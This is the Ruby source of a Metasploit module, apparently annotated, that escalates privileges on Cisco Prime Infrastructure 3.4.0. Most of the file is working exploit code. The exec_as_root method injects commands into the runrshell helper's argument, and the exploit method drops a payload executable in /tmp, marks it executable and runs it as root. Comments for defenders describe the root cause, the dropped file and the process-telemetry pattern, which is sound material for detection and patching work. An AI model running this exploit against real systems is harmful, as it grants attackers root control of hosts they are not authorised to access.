
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/local/cpi_runrshell_priv_esc.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local privilege-escalation module for Cisco Prime Infrastructure.
#
# The module runs inside an existing shell or meterpreter session on the
# target and relies on the +runrshell+ helper at
# /opt/CSCOlumos/bin/runrshell, which (per the module description) is meant
# to run a shell script as root but accepts extra commands injected through
# its argument.
#
# Notes for defenders, derived from the code below:
# * Root cause: a privileged helper hands an attacker-influenced argument to
#   a shell. The durable fix is in the helper itself (no shell evaluation of
#   its argument); see the advisory listed under 'References'.
# * On-disk artifact: a file named with 10 random letters plus ".bin" in
#   WritableDir (default /tmp). It is registered for cleanup, so it may be
#   gone by the time a host is examined.
# * Process telemetry: runrshell invoked with an argument containing quote
#   characters, "&&" and a trailing "#" is the pattern this module produces.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Declares the module metadata and the WritableDir advanced option.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values declared here via update_info
  def initialize(info = {})
    # NOTE(review): "This modules exploits" in the description is a typo for
    # "This module exploits"; the string is left as the author wrote it.
    module_info = {
      'Name' => 'Cisco Prime Infrastructure Runrshell Privilege Escalation',
      'Description' => %q{
        This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The
        runrshell binary is meant to execute a shell script as root, but can be abused to inject
        extra commands in the argument, allowing you to execute anything as root.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Pedro Ribeiro <pedrib[at]gmail.com>', # First discovery
        'sinn3r' # Metasploit module
      ],
      'Platform' => ['linux'],
      'Arch' => [ARCH_X86, ARCH_X64],
      'SessionTypes' => ['shell', 'meterpreter'],
      'DisclosureDate' => '2018-12-08',
      'Privileged' => true,
      'References' => [
        ['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/cisco-prime-infrastructure.txt#L56'],
      ],
      'Targets' => [
        [ 'Cisco Prime Infrastructure 3.4.0', {} ]
      ],
      'DefaultTarget' => 0
    }
    super(update_info(info, module_info))

    # Directory on the target that receives the payload file.
    writable_dir = OptString.new('WritableDir', [true, 'A directory where we can write the payload', '/tmp'])
    register_advanced_options([writable_dir])
  end

  # Runs +cmd+ through the runrshell helper and prints whatever the helper
  # returns when verbose output is enabled.
  #
  # +cmd+ is interpolated into the argument without any escaping; the
  # argument wraps it as <quote> && cmd #, which presumably terminates the
  # command line the helper builds and comments out the remainder --
  # confirm against the advisory.
  #
  # @param cmd [String] command line to run on the target
  def exec_as_root(cmd)
    helper_output = cmd_exec("/opt/CSCOlumos/bin/runrshell '\" && #{cmd} #'")
    vprint_status(helper_output)
  end

  # Writes the generated payload executable into WritableDir, marks it
  # executable via the helper, then runs it via the helper.
  #
  # Stops after printing an error when the file is not present on the target
  # after the write.
  def exploit
    # Random 10-letter base name with a fixed ".bin" suffix.
    dropped_name = "#{Rex::Text.rand_text_alpha(10)}.bin"
    dropped_path = Rex::FileUtils.normalize_unix_path(datastore['WritableDir'], dropped_name)

    print_status("Uploading #{dropped_path}")
    write_file(dropped_path, generate_payload_exe)

    uploaded = file?(dropped_path)
    unless uploaded
      print_error("Failed to upload #{dropped_path}")
      return
    end

    # FileDropper removes the file once a session is established.
    register_file_for_cleanup(dropped_path)

    print_status('chmod the file with +x')
    exec_as_root("/bin/chmod +x #{dropped_path}")

    print_status("Executing #{dropped_path}")
    exec_as_root(dropped_path)
  end
end